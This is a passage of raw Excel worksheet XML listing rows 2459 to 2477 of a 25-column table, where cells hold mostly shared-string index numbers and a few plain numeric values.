        <v>17351</v>
      </c>
      <c r="V2459" s="12" t="s">
        <v>3916</v>
      </c>
      <c r="W2459" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2459" s="12">
        <v>9</v>
      </c>
      <c r="Y2459" s="12" t="s">
        <v>17352</v>
      </c>
    </row>
    <row r="2460" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2460" s="12">
        <v>11926</v>
      </c>
      <c r="B2460" s="12" t="s">
        <v>30816</v>
      </c>
      <c r="D2460" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E2460" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F2460" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G2460" s="12" t="s">
        <v>17353</v>
      </c>
      <c r="H2460" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2460" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2460" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K2460" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2460" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2460" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2460" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2460" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2460" s="12" t="s">
        <v>17354</v>
      </c>
      <c r="Q2460" s="12" t="s">
        <v>28333</v>
      </c>
      <c r="R2460" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2460" s="12" t="s">
        <v>17355</v>
      </c>
      <c r="T2460" s="12" t="s">
        <v>17356</v>
      </c>
      <c r="U2460" s="12" t="s">
        <v>17357</v>
      </c>
      <c r="V2460" s="12" t="s">
        <v>10538</v>
      </c>
      <c r="W2460" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2460" s="12">
        <v>7</v>
      </c>
      <c r="Y2460" s="12" t="s">
        <v>17358</v>
      </c>
    </row>
    <row r="2461" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2461" s="12">
        <v>11928</v>
      </c>
      <c r="B2461" s="12" t="s">
        <v>30959</v>
      </c>
      <c r="D2461" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2461" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2461" s="12" t="s">
        <v>17363</v>
      </c>
      <c r="H2461" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2461" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2461" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K2461" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2461" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2461" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2461" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2461" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2461" s="12" t="s">
        <v>17255</v>
      </c>
      <c r="Q2461" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2461" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2461" s="12" t="s">
        <v>17364</v>
      </c>
      <c r="T2461" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2461" s="12" t="s">
        <v>17365</v>
      </c>
      <c r="V2461" s="12" t="s">
        <v>17009</v>
      </c>
      <c r="W2461" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2461" s="12">
        <v>12</v>
      </c>
      <c r="Y2461" s="12" t="s">
        <v>17366</v>
      </c>
    </row>
    <row r="2462" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2462" s="12">
        <v>11931</v>
      </c>
      <c r="B2462" s="12" t="s">
        <v>30525</v>
      </c>
      <c r="C2462" s="12" t="s">
        <v>30540</v>
      </c>
      <c r="D2462" s="12" t="s">
        <v>30541</v>
      </c>
      <c r="F2462" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2462" s="12" t="s">
        <v>17367</v>
      </c>
      <c r="H2462" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2462" s="12" t="s">
        <v>5208</v>
      </c>
      <c r="J2462" s="12" t="s">
        <v>10483</v>
      </c>
      <c r="K2462" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2462" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2462" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2462" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2462" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2462" s="12" t="s">
        <v>17368</v>
      </c>
      <c r="Q2462" s="12" t="s">
        <v>28309</v>
      </c>
      <c r="R2462" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2462" s="12" t="s">
        <v>17369</v>
      </c>
      <c r="T2462" s="12" t="s">
        <v>17370</v>
      </c>
      <c r="U2462" s="12" t="s">
        <v>17371</v>
      </c>
      <c r="V2462" s="12" t="s">
        <v>10483</v>
      </c>
      <c r="W2462" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2462" s="12">
        <v>7</v>
      </c>
      <c r="Y2462" s="12" t="s">
        <v>17372</v>
      </c>
    </row>
    <row r="2463" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2463" s="12">
        <v>11937</v>
      </c>
      <c r="B2463" s="12" t="s">
        <v>28341</v>
      </c>
      <c r="C2463" s="12" t="s">
        <v>28343</v>
      </c>
      <c r="D2463" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E2463" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F2463" s="12" t="s">
        <v>29728</v>
      </c>
      <c r="G2463" s="12" t="s">
        <v>17373</v>
      </c>
      <c r="H2463" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2463" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J2463" s="12" t="s">
        <v>458</v>
      </c>
      <c r="K2463" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2463" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2463" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2463" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2463" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2463" s="12" t="s">
        <v>17255</v>
      </c>
      <c r="Q2463" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2463" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2463" s="12" t="s">
        <v>17374</v>
      </c>
      <c r="T2463" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2463" s="12" t="s">
        <v>17375</v>
      </c>
      <c r="V2463" s="12" t="s">
        <v>9076</v>
      </c>
      <c r="W2463" s="12">
        <v>11935</v>
      </c>
      <c r="X2463" s="12">
        <v>7</v>
      </c>
      <c r="Y2463" s="12" t="s">
        <v>17376</v>
      </c>
    </row>
    <row r="2464" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2464" s="12">
        <v>11947</v>
      </c>
      <c r="B2464" s="12" t="s">
        <v>30153</v>
      </c>
      <c r="C2464" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D2464" s="12" t="s">
        <v>30152</v>
      </c>
      <c r="E2464" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2464" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2464" s="12" t="s">
        <v>17386</v>
      </c>
      <c r="H2464" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2464" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2464" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K2464" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2464" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M2464" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N2464" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O2464" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2464" s="12" t="s">
        <v>17387</v>
      </c>
      <c r="Q2464" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2464" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2464" s="12" t="s">
        <v>17388</v>
      </c>
      <c r="T2464" s="12" t="s">
        <v>12546</v>
      </c>
      <c r="U2464" s="12" t="s">
        <v>17389</v>
      </c>
      <c r="V2464" s="12" t="s">
        <v>6141</v>
      </c>
      <c r="W2464" s="12">
        <v>11984</v>
      </c>
      <c r="X2464" s="12">
        <v>63</v>
      </c>
      <c r="Y2464" s="12" t="s">
        <v>17390</v>
      </c>
    </row>
    <row r="2465" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2465" s="12">
        <v>11951</v>
      </c>
      <c r="B2465" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C2465" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D2465" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2465" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F2465" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2465" s="12" t="s">
        <v>17391</v>
      </c>
      <c r="H2465" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2465" s="12" t="s">
        <v>152</v>
      </c>
      <c r="J2465" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2465" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2465" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2465" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2465" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2465" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2465" s="12" t="s">
        <v>17255</v>
      </c>
      <c r="Q2465" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2465" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2465" s="12" t="s">
        <v>17392</v>
      </c>
      <c r="T2465" s="12" t="s">
        <v>9076</v>
      </c>
      <c r="U2465" s="12" t="s">
        <v>17393</v>
      </c>
      <c r="V2465" s="12" t="s">
        <v>5265</v>
      </c>
      <c r="W2465" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2465" s="12">
        <v>9</v>
      </c>
      <c r="Y2465" s="12" t="s">
        <v>17394</v>
      </c>
    </row>
    <row r="2466" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2466" s="12">
        <v>11957</v>
      </c>
      <c r="B2466" s="12" t="s">
        <v>31255</v>
      </c>
      <c r="D2466" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2466" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2466" s="12" t="s">
        <v>31242</v>
      </c>
      <c r="G2466" s="12" t="s">
        <v>17401</v>
      </c>
      <c r="H2466" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2466" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2466" s="12" t="s">
        <v>728</v>
      </c>
      <c r="K2466" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2466" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2466" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2466" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2466" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2466" s="12" t="s">
        <v>17248</v>
      </c>
      <c r="Q2466" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2466" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2466" s="12" t="s">
        <v>17402</v>
      </c>
      <c r="T2466" s="12" t="s">
        <v>3876</v>
      </c>
      <c r="U2466" s="12" t="s">
        <v>17403</v>
      </c>
      <c r="V2466" s="12" t="s">
        <v>3933</v>
      </c>
      <c r="W2466" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2466" s="12">
        <v>4</v>
      </c>
      <c r="Y2466" s="12" t="s">
        <v>17404</v>
      </c>
    </row>
    <row r="2467" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2467" s="12">
        <v>11964</v>
      </c>
      <c r="B2467" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2467" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2467" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F2467" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2467" s="12" t="s">
        <v>17405</v>
      </c>
      <c r="H2467" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2467" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J2467" s="12" t="s">
        <v>12555</v>
      </c>
      <c r="K2467" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2467" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2467" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2467" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2467" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2467" s="12" t="s">
        <v>17248</v>
      </c>
      <c r="Q2467" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2467" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2467" s="12" t="s">
        <v>17406</v>
      </c>
      <c r="T2467" s="12" t="s">
        <v>9076</v>
      </c>
      <c r="U2467" s="12" t="s">
        <v>17407</v>
      </c>
      <c r="V2467" s="12" t="s">
        <v>9076</v>
      </c>
      <c r="W2467" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2467" s="12">
        <v>2</v>
      </c>
      <c r="Y2467" s="12" t="s">
        <v>17408</v>
      </c>
    </row>
    <row r="2468" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2468" s="12">
        <v>11965</v>
      </c>
      <c r="B2468" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C2468" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D2468" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2468" s="12" t="s">
        <v>31474</v>
      </c>
      <c r="F2468" s="12" t="s">
        <v>29991</v>
      </c>
      <c r="G2468" s="12" t="s">
        <v>17409</v>
      </c>
      <c r="H2468" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2468" s="12" t="s">
        <v>152</v>
      </c>
      <c r="J2468" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2468" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2468" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2468" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2468" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2468" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2468" s="12" t="s">
        <v>17220</v>
      </c>
      <c r="Q2468" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2468" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2468" s="12" t="s">
        <v>17410</v>
      </c>
      <c r="T2468" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2468" s="12" t="s">
        <v>17411</v>
      </c>
      <c r="V2468" s="12" t="s">
        <v>13583</v>
      </c>
      <c r="W2468" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2468" s="12">
        <v>7</v>
      </c>
      <c r="Y2468" s="12" t="s">
        <v>17412</v>
      </c>
    </row>
    <row r="2469" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2469" s="12">
        <v>11966</v>
      </c>
      <c r="B2469" s="12" t="s">
        <v>30686</v>
      </c>
      <c r="D2469" s="12" t="s">
        <v>30704</v>
      </c>
      <c r="F2469" s="12" t="s">
        <v>30705</v>
      </c>
      <c r="G2469" s="12" t="s">
        <v>17413</v>
      </c>
      <c r="H2469" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2469" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2469" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K2469" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2469" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2469" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2469" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2469" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2469" s="12" t="s">
        <v>17387</v>
      </c>
      <c r="Q2469" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2469" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2469" s="12" t="s">
        <v>17414</v>
      </c>
      <c r="T2469" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2469" s="12" t="s">
        <v>17415</v>
      </c>
      <c r="V2469" s="12" t="s">
        <v>8133</v>
      </c>
      <c r="W2469" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2469" s="12">
        <v>4</v>
      </c>
      <c r="Y2469" s="12" t="s">
        <v>17416</v>
      </c>
    </row>
    <row r="2470" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2470" s="12">
        <v>11970</v>
      </c>
      <c r="B2470" s="12" t="s">
        <v>31255</v>
      </c>
      <c r="D2470" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2470" s="12" t="s">
        <v>31458</v>
      </c>
      <c r="F2470" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2470" s="12" t="s">
        <v>17417</v>
      </c>
      <c r="H2470" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2470" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J2470" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K2470" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2470" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M2470" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N2470" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O2470" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2470" s="12" t="s">
        <v>17387</v>
      </c>
      <c r="Q2470" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2470" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2470" s="12" t="s">
        <v>17418</v>
      </c>
      <c r="T2470" s="12" t="s">
        <v>17298</v>
      </c>
      <c r="U2470" s="12" t="s">
        <v>17419</v>
      </c>
      <c r="V2470" s="12" t="s">
        <v>11875</v>
      </c>
      <c r="W2470" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2470" s="12">
        <v>71</v>
      </c>
      <c r="Y2470" s="12" t="s">
        <v>17420</v>
      </c>
    </row>
    <row r="2471" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2471" s="12">
        <v>11975</v>
      </c>
      <c r="B2471" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2471" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2471" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G2471" s="12" t="s">
        <v>17421</v>
      </c>
      <c r="H2471" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2471" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J2471" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K2471" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2471" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2471" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2471" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2471" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2471" s="12" t="s">
        <v>14989</v>
      </c>
      <c r="Q2471" s="12" t="s">
        <v>31403</v>
      </c>
      <c r="R2471" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2471" s="12" t="s">
        <v>17422</v>
      </c>
      <c r="T2471" s="12" t="s">
        <v>14828</v>
      </c>
      <c r="U2471" s="12" t="s">
        <v>17423</v>
      </c>
      <c r="V2471" s="12" t="s">
        <v>6182</v>
      </c>
      <c r="W2471" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2471" s="12">
        <v>2</v>
      </c>
      <c r="Y2471" s="12" t="s">
        <v>17424</v>
      </c>
    </row>
    <row r="2472" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2472" s="12">
        <v>11978</v>
      </c>
      <c r="B2472" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D2472" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2472" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2472" s="12" t="s">
        <v>17425</v>
      </c>
      <c r="H2472" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2472" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J2472" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K2472" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2472" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2472" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2472" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2472" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2472" s="12" t="s">
        <v>16950</v>
      </c>
      <c r="Q2472" s="12" t="s">
        <v>28309</v>
      </c>
      <c r="R2472" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2472" s="12" t="s">
        <v>17426</v>
      </c>
      <c r="T2472" s="12" t="s">
        <v>17427</v>
      </c>
      <c r="U2472" s="12" t="s">
        <v>17428</v>
      </c>
      <c r="V2472" s="12" t="s">
        <v>3738</v>
      </c>
      <c r="W2472" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2472" s="12">
        <v>4</v>
      </c>
      <c r="Y2472" s="12" t="s">
        <v>17429</v>
      </c>
    </row>
    <row r="2473" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2473" s="12">
        <v>11982</v>
      </c>
      <c r="B2473" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2473" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2473" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2473" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2473" s="12" t="s">
        <v>17436</v>
      </c>
      <c r="H2473" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2473" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2473" s="12" t="s">
        <v>2575</v>
      </c>
      <c r="K2473" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2473" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2473" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2473" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2473" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2473" s="12" t="s">
        <v>17387</v>
      </c>
      <c r="Q2473" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2473" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2473" s="12" t="s">
        <v>17437</v>
      </c>
      <c r="T2473" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2473" s="12" t="s">
        <v>17438</v>
      </c>
      <c r="V2473" s="12" t="s">
        <v>9065</v>
      </c>
      <c r="W2473" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2473" s="12">
        <v>6</v>
      </c>
      <c r="Y2473" s="12" t="s">
        <v>17439</v>
      </c>
    </row>
    <row r="2474" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2474" s="12">
        <v>11985</v>
      </c>
      <c r="B2474" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2474" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2474" s="12" t="s">
        <v>31527</v>
      </c>
      <c r="F2474" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2474" s="12" t="s">
        <v>17444</v>
      </c>
      <c r="H2474" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2474" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J2474" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2474" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2474" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2474" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2474" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2474" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2474" s="12" t="s">
        <v>17387</v>
      </c>
      <c r="Q2474" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2474" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2474" s="12" t="s">
        <v>17445</v>
      </c>
      <c r="T2474" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2474" s="12" t="s">
        <v>17446</v>
      </c>
      <c r="V2474" s="12" t="s">
        <v>10177</v>
      </c>
      <c r="W2474" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2474" s="12">
        <v>1</v>
      </c>
      <c r="Y2474" s="12" t="s">
        <v>17447</v>
      </c>
    </row>
    <row r="2475" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2475" s="12">
        <v>11988</v>
      </c>
      <c r="B2475" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C2475" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D2475" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2475" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2475" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2475" s="12" t="s">
        <v>17448</v>
      </c>
      <c r="H2475" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2475" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2475" s="12" t="s">
        <v>162</v>
      </c>
      <c r="K2475" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2475" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2475" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2475" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2475" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2475" s="12" t="s">
        <v>17220</v>
      </c>
      <c r="Q2475" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2475" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2475" s="12" t="s">
        <v>17449</v>
      </c>
      <c r="T2475" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2475" s="12" t="s">
        <v>17450</v>
      </c>
      <c r="V2475" s="12" t="s">
        <v>3737</v>
      </c>
      <c r="W2475" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2475" s="12">
        <v>1</v>
      </c>
      <c r="Y2475" s="12" t="s">
        <v>17451</v>
      </c>
    </row>
    <row r="2476" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2476" s="12">
        <v>11989</v>
      </c>
      <c r="B2476" s="12" t="s">
        <v>30316</v>
      </c>
      <c r="C2476" s="12" t="s">
        <v>30311</v>
      </c>
      <c r="D2476" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2476" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2476" s="12" t="s">
        <v>17452</v>
      </c>
      <c r="H2476" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2476" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J2476" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K2476" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2476" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2476" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2476" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2476" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2476" s="12" t="s">
        <v>17453</v>
      </c>
      <c r="Q2476" s="12" t="s">
        <v>28335</v>
      </c>
      <c r="R2476" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2476" s="12" t="s">
        <v>17454</v>
      </c>
      <c r="T2476" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2476" s="12" t="s">
        <v>17455</v>
      </c>
      <c r="V2476" s="12" t="s">
        <v>17456</v>
      </c>
      <c r="W2476" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2476" s="12">
        <v>4</v>
      </c>
      <c r="Y2476" s="12" t="s">
        <v>17457</v>
      </c>
    </row>
    <row r="2477" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2477" s="12">
        <v>11993</v>
      </c>
      <c r="B2477" s="12" t="s">
        <v>30389</v>
      </c>
      <c r="C2477" s="12" t="s">
        <v>30390</v>
      </c>
      <c r="D2477" s="12" t="s">
        <v>30391</v>
      </c>
      <c r="F2477" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G2477" s="12" t="s">
        <v>17458</v>
      </c>
      <c r="H2477" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2477" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J2477" s="12" t="s">
        <v>201</v>
      </c>
      <c r="K2477" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2477" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2477" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2477" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2477" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2477" s="12" t="s">
        <v>17459</v>
      </c>
      <c r="Q2477" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R2477" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2477" s="12" t="s">
        <v>17460</v>
      </c>
      <c r="T2477" s="12" t="s">
        <v>17461</v>
      </c>
      <c r="U2477" s="12" t="s">
        <v>17462</v>
      </c>
      <c r="V2477" s="12" t="s">
        <v>4176</v>
      </c>
      <c r="W2477" s="12" t="s">
        <v>20</v>
